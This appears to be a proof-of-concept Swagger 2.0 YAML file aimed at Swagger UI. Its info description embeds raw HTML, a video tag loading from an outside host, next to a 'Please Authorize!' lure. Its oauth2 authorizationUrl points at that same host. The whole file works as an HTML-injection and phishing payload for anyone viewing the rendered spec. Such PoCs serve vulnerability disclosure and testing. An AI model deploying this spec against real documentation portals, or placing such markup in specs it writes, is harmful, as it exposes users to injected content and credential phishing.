swagger: '2.0'
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: http://authorization.site
info:
  version: "0.0.1"
  title: 0xcNyx POC arbitrary text
  description: Please Authorize!<video src=//authorization.site>
paths:
  /:
    get:
      responses:
        200:
          description: Successful respons
